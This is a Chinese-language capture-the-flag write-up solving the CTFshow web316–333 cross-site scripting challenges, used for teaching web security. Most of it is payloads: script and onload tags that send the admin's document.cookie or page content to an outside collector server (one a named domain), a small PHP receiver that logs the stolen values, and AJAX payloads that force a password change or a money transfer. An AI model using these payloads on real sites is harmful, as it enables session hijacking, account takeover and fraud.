CTFshow--web--xss

目录

web316

web317~319

web320~326

web327

web328

web329

web330

web331

web332

web333


先在自己的服务器写上代码

php 复制代码
<?php

$content = $_GET[1];
if(isset($content)){
    file_put_contents('flag.txt','$content');
}else{
    echo 'no data input';
}

要拿到管理员的cookie , 而不是自己的

web316

<script>document.location.href="[ip]/x.php?1="+document.cookie</script>

web317~319

有了过滤

<body οnlοad="window.location.href='http://[ip]/x.php?1='+document.cookie">

web320~326

过滤了空格

<body/οnlοad="window.location.href='[ip]/x.php?1='+document.cookie">

web327

存储型xss

在信的内容那里输入

<script>document.location.href='http://pmjphw.top/x.php?1='+document.cookie\</script>

web328

注册的地方

注册一个密码为XSS Payload

<script>document.location.href='[ip]?1='+document.cookie</script>

就可以在自己的服务器上得到 管理员的cookie

在网页上将自己的cookie换掉 就可以进入到用户管理界面了 ,里面存在flag

但是一进入到里面就会跳转, 只能看到一瞬间的flag , 所以还需要进行抓包查看

多抓包了几次 , 搞了一下, 好像也进入到这个界面了, 没有跳转

web329

用上一个方法拿cookie的话没有用, 已经失效了,登录不上

直接拿内容

复制代码
<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerHTML.indexOf('ctf'+'show{')>-1)
{window.location.href='[ip]/x.php?1='+value.innerHTML;}});</script>

web330

有一个修改密码的模块

在修改密码的那里 写入xss payload

复制代码
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

然后 admin / 123 登录

然后进入到用户管理界面

速度快一点, 两秒左右就会跳转走

web331

在注册的用户名处写入 xss payload

复制代码
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

然后 admin / 123 登录

web332

先注册一个123的用户登录

然后再注册一个 xss payload 的用户

123的用户就可以收到钱了

复制代码
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

web333

跟上一题一样

复制代码
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

CTFSHOW-XSS - Boogiepop Doesn't Laugh
ctfshow-XSS篇 - 简书
https://juejin.cn/post/7083663044865163277

相关推荐
小杨升级打怪中42 分钟前
前端面经-JS篇(三)--事件、性能优化、防抖与节流
前端·javascript·xss
uwvwko5 小时前
ctfhow——web入门214~218(时间盲注开始)
前端·数据库·mysql·ctf
阳光普照世界和平2 天前
从单点突破到链式攻击:XSS 的渗透全路径解析
前端·web安全·xss
jonhswei2 天前
xss学习6
学习·xss
我最厉害。,。2 天前
CSRF 请求伪造&Referer 同源&置空&配合 XSS&Token 值校验&复用删除
前端·xss·csrf
萌萌哒草头将军4 天前
注意!⚠️ 🔥 🚧 PostgreSQL 存在安全漏洞,请及时更新版本或者停用删除相关服务,防止中招!🚀🚀🚀
服务器·postgresql·xss
独行soc5 天前
2025年渗透测试面试题总结-拷打题库06(题目+回答)
java·开发语言·前端·中间件·数据挖掘·php·xss
魔云连洲5 天前
深入理解前端安全:CSRF与XSS攻击详解
前端·安全·xss·csrf
vortex55 天前
详解反射型 XSS 的后续利用方式:从基础窃取到高级组合拳攻击链
前端·网络·网络安全·渗透测试·xss
uwvwko8 天前
ctfshow——web入门191~194
前端·数据库·mysql·安全·ctf